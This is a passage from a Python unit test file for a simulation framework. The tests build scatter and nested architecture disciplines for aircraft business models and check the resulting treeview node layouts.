{'Parent': ['Business'],
'Current': ['AC_Sales'],
'Type': ['SumValueBlockDiscipline'],
'Action': [('scatter', 'AC_list', ('scatter', 'component_list', 'ValueBlockDiscipline'))],
'Activation': [False]})
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
self.exec_eng.factory.set_builders_to_coupling_builder(
builder)
self.exec_eng.configure()
self.exec_eng.load_study_from_input_dict({})
self.exec_eng.display_treeview_nodes()
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ AC_Sales', ]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
activation_df = pd.DataFrame(
{'AC_list': [None],
'component_list': [None],
'AC_Sales': [True]})
self.assertDictEqual(activation_df.to_dict(), self.exec_eng.dm.get_value(
'MyCase.Business.activation_df').to_dict())
activation_df = pd.DataFrame(
{'AC_list': ['AC1', 'AC1', 'AC2', 'AC3'],
'component_list': ['Propulsion', 'Airframe', 'Airframe', 'Airframe'],
'AC_Sales': [True, True, True, True]})
self.exec_eng.load_study_from_input_dict(
{'MyCase.Business.activation_df': activation_df})
self.exec_eng.display_treeview_nodes(display_variables=True)
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ AC_Sales',
'\t\t\t|_ AC1',
'\t\t\t\t|_ Propulsion',
'\t\t\t\t|_ Airframe',
'\t\t\t|_ AC2',
'\t\t\t\t|_ Airframe',
'\t\t\t|_ AC3',
'\t\t\t\t|_ Airframe',
]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
ac1_disciplines = self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.AC_Sales.AC1')
acsales_disciplines = self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.AC_Sales')
self.assertListEqual([child.get_disc_full_name()
for child in ac1_disciplines[0].children_list],
['MyCase.Business.AC_Sales.AC1.Propulsion',
'MyCase.Business.AC_Sales.AC1.Airframe'])
# We have sumdisciplines but also scatter disciplines (which do not
# have outputs)
self.assertListEqual([child.get_disc_full_name()
for child in acsales_disciplines[0].children_list], ['MyCase.Business.AC_Sales.AC1',
'MyCase.Business.AC_Sales.AC2',
'MyCase.Business.AC_Sales.AC3',
'MyCase.Business.AC_Sales.AC1',
'MyCase.Business.AC_Sales.AC2',
'MyCase.Business.AC_Sales.AC3'])
acpropu_disciplines = self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.AC_Sales.AC1.Propulsion')
self.assertListEqual([child.get_disc_full_name()
for child in acpropu_disciplines[0].children_list], [])
def test_06_build_scatter_of_scatter_with_option(self):
mydict = {'input_name': 'AC_list',
'input_type': 'string_list',
'input_ns': 'ns_public',
'output_name': 'AC_name',
'scatter_ns': 'ns_ac'}
self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
mydict = {'input_name': 'component_list',
'input_type': 'string_list',
'input_ns': 'ns_public',
'output_name': 'component_name',
'scatter_ns': 'ns_ac'}
self.exec_eng.smaps_manager.add_build_map('component_list', mydict)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
vb_builder_name = 'Business'
architecture_df = pd.DataFrame(
{'Parent': ['Business'],
'Current': ['AC_Sales'],
'Type': ['SumValueBlockDiscipline'],
'Action': [('scatter', 'AC_list', ('scatter', 'component_list', 'ValueBlockDiscipline'),
'FakeValueBlockDiscipline')],
'Activation': [False]})
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
self.exec_eng.factory.set_builders_to_coupling_builder(
builder)
self.exec_eng.load_study_from_input_dict({})
self.exec_eng.display_treeview_nodes()
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ AC_Sales', ]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
activation_df = pd.DataFrame(
{'AC_list': [None],
'component_list': [None],
'AC_Sales': [True]})
self.assertDictEqual(activation_df.to_dict(), self.exec_eng.dm.get_value(
'MyCase.Business.activation_df').to_dict())
activation_df = pd.DataFrame(
{'AC_list': ['AC1', 'AC1', 'AC2', 'AC3'],
'component_list': ['Propulsion', 'Airframe', 'Airframe', 'Airframe'],
'AC_Sales': [True, True, True, True]})
self.exec_eng.load_study_from_input_dict(
{'MyCase.Business.activation_df': activation_df})
self.exec_eng.display_treeview_nodes(display_variables=True)
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ AC_Sales',
'\t\t\t|_ AC1',
'\t\t\t\t|_ Propulsion',
'\t\t\t\t|_ Airframe',
'\t\t\t|_ AC2',
'\t\t\t\t|_ Airframe',
'\t\t\t|_ AC3',
'\t\t\t\t|_ Airframe',
]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
ac1_disciplines = self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.AC_Sales.AC1')
# check if discipline from first scatter taking in account
assert len(ac1_disciplines) == 2
assert isinstance(ac1_disciplines[0], ValueBlockDiscipline)
assert isinstance(ac1_disciplines[1], SoSDisciplineScatter)
acsales_disciplines = self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.AC_Sales')
self.assertListEqual([child.get_disc_full_name()
for child in ac1_disciplines[0].children_list],
['MyCase.Business.AC_Sales.AC1.Propulsion',
'MyCase.Business.AC_Sales.AC1.Airframe'])
# We have sumdisciplines but also scatter disciplines (which do not
# have outputs)
self.assertListEqual([child.get_disc_full_name()
for child in acsales_disciplines[0].children_list], ['MyCase.Business.AC_Sales.AC1',
'MyCase.Business.AC_Sales.AC2',
'MyCase.Business.AC_Sales.AC3',
'MyCase.Business.AC_Sales.AC1',
'MyCase.Business.AC_Sales.AC2',
'MyCase.Business.AC_Sales.AC3'])
acpropu_disciplines = self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.AC_Sales.AC1.Propulsion')
self.assertListEqual([child.get_disc_full_name()
for child in acpropu_disciplines[0].children_list], [])
activation_df = pd.DataFrame(
{'AC_list': ['AC1', 'AC1', 'AC2', 'AC3', 'AC4'],
'component_list': ['Propulsion', 'Airframe', 'Airframe', 'Airframe', 'Airframe'],
'AC_Sales': [True, True, True, True, True]})
self.exec_eng.load_study_from_input_dict(
{'MyCase.Business.activation_df': activation_df})
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ AC_Sales',
'\t\t\t|_ AC1',
'\t\t\t\t|_ Propulsion',
'\t\t\t\t|_ Airframe',
'\t\t\t|_ AC2',
'\t\t\t\t|_ Airframe',
'\t\t\t|_ AC3',
'\t\t\t\t|_ Airframe',
'\t\t\t|_ AC4',
'\t\t\t\t|_ Airframe',
]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_07_build_scatter_under_sub_architecture(self):
vb_builder_name = 'Business'
mydict = {'input_name': 'AC_list',
'input_type': 'string_list',
'input_ns': 'ns_public',
'output_name': 'AC_name',
'scatter_ns': 'ns_ac'}
self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
sub_architecture_df = pd.DataFrame(
{'Parent': ['Airbus'],
'Current': ['Flight Hour'],
'Type': ['SumValueBlockDiscipline'],
'Action': [('scatter', 'AC_list', 'ValueBlockDiscipline')],
'Activation': [False], })
architecture_df = pd.DataFrame(
{'Parent': ['Business'],
'Current': ['Airbus'],
'Type': ['SumValueBlockDiscipline'],
'Action': [('architecture', sub_architecture_df)],
'Activation': [False], })
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
self.exec_eng.factory.set_builders_to_coupling_builder(
builder)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
# Double configure without ac_list can mess with archi builder
self.exec_eng.configure()
activation_df = pd.DataFrame(
{'AC_list': ['AC1', 'AC2', 'AC3'],
'Flight Hour': [True, True, True],
'Airbus': [True, True, True]})
self.exec_eng.load_study_from_input_dict(
{'MyCase.Business.activation_df': activation_df})
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ Airbus',
'\t\t\t|_ Flight Hour',
'\t\t\t\t|_ AC1',
'\t\t\t\t|_ AC2',
'\t\t\t\t|_ AC3', ]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
print(self.exec_eng.display_treeview_nodes())
def _test_08_build_scatter_under_scatter_architecture(self):
'''
Build scatter under scatter_architecture is not possible yet
We have to manage properly the namespaces to have this capability
'''
vb_builder_name = 'Business'
mydict = {'input_name': 'AC_list',
'input_type': 'string_list',
'input_ns': 'ns_public',
'output_name': 'AC_name',
'scatter_ns': 'ns_ac'}
self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
actor_map_dict = {'input_name': 'Actor_list',
'input_type': 'string_list',
'input_ns': 'ns_public',
'output_name': 'Actor_name',
'scatter_ns': 'ns_actor'}
self.exec_eng.smaps_manager.add_build_map('Actor_list', actor_map_dict)
sub_architecture_df = pd.DataFrame(
{'Parent': ['Business'],
'Current': ['Flight Hour'],
'Type': ['SumValueBlockDiscipline'],
'Action': [('scatter', 'AC_list', 'ValueBlockDiscipline')],
'Activation': [False], })
architecture_df = pd.DataFrame(
{'Parent': [None],
'Current': ['Business'],
'Type': ['SumValueBlockDiscipline'],
'Action': [
('scatter_architecture', 'Actor_list', 'SumBusinessActorValueBlockDiscipline', sub_architecture_df)],
'Activation': [False], })
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
self.exec_eng.factory.set_builders_to_coupling_builder(
builder)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.load_study_from_input_dict({})
activation_df = pd.DataFrame(
{'Actor_list': ['Airbus', 'Airbus', 'Boeing'],
'Business': [True, True, True],
'AC_list': ['AC1', 'AC2', 'AC3'],
'Flight Hour': [True, True, True]})
self.exec_eng.load_study_from_input_dict(
{'MyCase.Business.activation_df': activation_df})
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ Actors',
'\t\t\t|_ Airbus',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ AC1',
'\t\t\t\t\t|_ AC2',
'\t\t\t|_ Boeing',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ AC3', ]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_09_build_scatter_of_architecture(self):
"""
This test aims at proving the ability to build a scatter of architecture.
we build a simple architecture under a scatter of actors
The test also proves the ability of the scatter to clean the architecture afterward
"""
mydict = {'input_name': 'actors_list',
'input_type': 'string_list',
'input_ns': 'ns_actors',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac'} # or object ScatterMapBuild
# >> introduce ScatterMap
self.exec_eng.smaps_manager.add_build_map('actors_list', mydict)
self.exec_eng.ns_manager.add_ns('ns_actors', 'MyCase')
architecture_name = 'Services'
architecture_df = pd.DataFrame(
{'Parent': ['Flight Hour', 'Maintenance', 'Services', 'Services'],
'Current': ['FHS', 'OSS', 'Flight Hour', 'Maintenance'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'SumValueBlockDiscipline',
'SumValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('standard')],
'Activation': [False, False, True, True], })
builder = self.factory.create_architecture_builder(
architecture_name, architecture_df)
scatter = self.exec_eng.factory.create_scatter_builder('Business',
'actors_list', [builder])
self.exec_eng.factory.set_builders_to_coupling_builder(scatter)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_market_in': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
dict_values = {self.study_name +
'.actors_list': ['Airbus', 'Boeing']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("with Boeing and Airbus as actors")
print(self.exec_eng.display_treeview_nodes())
initial_tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
'\t\t|_ Airbus',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS',
'\t\t|_ Boeing',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS'
]
initial_tree_view = '\n'.join(initial_tree_view)
self.assertEqual(initial_tree_view,
self.exec_eng.display_treeview_nodes())
dict_values = {self.study_name +
'.actors_list': ['Airbus', 'Embraer']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("Deleting Boeing and inserting Embraer")
print(self.exec_eng.display_treeview_nodes())
second_tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
'\t\t|_ Airbus',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS',
'\t\t|_ Embraer',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS'
]
second_tree_view = '\n'.join(second_tree_view)
self.assertEqual(second_tree_view,
self.exec_eng.display_treeview_nodes())
dict_values = {self.study_name +
'.actors_list': ['Comac', 'ATR']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("Deleting Embraer and Airbus and inserting Comac and ATR")
print(self.exec_eng.display_treeview_nodes())
third_tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
'\t\t|_ Comac',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS',
'\t\t|_ ATR',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS'
]
third_tree_view = '\n'.join(third_tree_view)
self.assertEqual(
third_tree_view, self.exec_eng.display_treeview_nodes())
def test_10_build_scatter_of_architecture_with_sub_architecture(self):
"""
This test aims at proving the ability to build a scatter of architecture and sub architecture.
we build a complex sub architecture of architecture under a scatter of actors
The test also proves the ability of the scatter to clean the architecture of sub architecture afterward
"""
mydict = {'input_name': 'actors_list',
'input_type': 'string_list',
'input_ns': 'ns_actors',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac'} # or object ScatterMapBuild
# >> introduce ScatterMap
self.exec_eng.smaps_manager.add_build_map('actors_list', mydict)
self.exec_eng.ns_manager.add_ns('ns_actors', 'MyCase')
vb_builder_name = 'Business'
sub_architecture_df = pd.DataFrame(
{'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('standard')],
'Activation': [False, False, False, False], })
architecture_df = pd.DataFrame(
{'Parent': ['Business', 'Business', 'First_Node', 'Second_Node'],
'Current': ['First_Node', 'Second_Node', 'Services', 'AC_Sales'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('architecture', sub_architecture_df), ('standard')],
'Activation': [True, True, False, False], })
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
scatter = self.exec_eng.factory.create_scatter_builder('Scatter',
'actors_list', [builder])
self.exec_eng.factory.set_builders_to_coupling_builder(scatter)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_market_in': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
dict_values = {self.study_name +
'.actors_list': ['Airbus', 'Boeing']}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.load_study_from_input_dict(dict_values)
print("with Boeing and Airbus as actors")
initial_tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
'\t|_ Scatter',
'\t\t|_ Airbus',
'\t\t\t|_ Business',
'\t\t\t\t|_ First_Node',
'\t\t\t\t\t|_ Services',
'\t\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ Second_Node',
'\t\t\t\t\t|_ AC_Sales',
'\t\t|_ Boeing',
'\t\t\t|_ Business',
'\t\t\t\t|_ First_Node',
'\t\t\t\t\t|_ Services',
'\t\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ Second_Node',
'\t\t\t\t\t|_ AC_Sales',
]
initial_tree_view = '\n'.join(initial_tree_view)
self.assertEqual(initial_tree_view,
self.exec_eng.display_treeview_nodes())
print(self.exec_eng.display_treeview_nodes())
dict_values = {self.study_name +
'.actors_list': ['Airbus', 'Embraer']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("Deleting Boeing and inserting Embraer")
second_tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
'\t|_ Scatter',
'\t\t|_ Airbus',
'\t\t\t|_ Business',
'\t\t\t\t|_ First_Node',
'\t\t\t\t\t|_ Services',
'\t\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ Second_Node',
'\t\t\t\t\t|_ AC_Sales',
'\t\t|_ Embraer',
'\t\t\t|_ Business',
'\t\t\t\t|_ First_Node',
'\t\t\t\t\t|_ Services',
'\t\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ Second_Node',
'\t\t\t\t\t|_ AC_Sales',
]
second_tree_view = '\n'.join(second_tree_view)
self.assertEqual(second_tree_view,
self.exec_eng.display_treeview_nodes())
print(self.exec_eng.display_treeview_nodes())
def test_11_build_scatter_of_architecture_with_sub_architecture_from_process(self):
"""
This test aims at proving the ability to build a scatter of architecture and sub architecture.
we build a complex sub architecture of architecture under a scatter of actors
The test also proves the ability of the scatter to clean the architecture of sub architecture afterward
"""
builder_process = self.exec_eng.factory.get_builder_from_process(
'sos_trades_core.sos_processes.test', 'test_scatter_architecture')
self.exec_eng.factory.set_builders_to_coupling_builder(builder_process)
self.exec_eng.configure()
activ_df = pd.DataFrame({'AC_list': ['NSA-300', 'NSA-300', 'NSA-400', 'NSA-400'],
'subsystem_list': ['Airframe', 'Propulsion', 'Airframe', 'Propulsion'],
'OSS': [True, True, True, True],
'FHS': [True, True, True, True],
'Pool': [True, True, True, True],
'TSP': [True, True, True, True],
'Sales': [True, True, True, True]})
dict_values = {
f'{self.study_name}.Business.actors_list': ['Airbus', 'Boeing'],
f'{self.study_name}.Business.Airbus.activation_df': activ_df,
f'{self.study_name}.Business.Boeing.activation_df': activ_df}
self.exec_eng.load_study_from_input_dict(dict_values)
print("with Boeing and Airbus as actors")
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
f'\t\t|_ Airbus',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t|_ Boeing',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion']
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
dict_values = {self.study_name +
'.Business.actors_list': ['Airbus', 'Embraer']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("Deleting Boeing and inserting Embraer")
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
f'\t\t|_ Airbus',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t|_ Embraer',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t|_ TSP',
f'\t\t\t|_ Sales']
exp_tv_str = '\n'.join(exp_tv_list)
print(self.exec_eng.display_treeview_nodes())
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
dict_values = {
f'{self.study_name}.Business.Embraer.activation_df': activ_df}
self.exec_eng.load_study_from_input_dict(dict_values)
print("Deleting Boeing and inserting Embraer")
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
f'\t\t|_ Airbus',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t|_ Embraer',
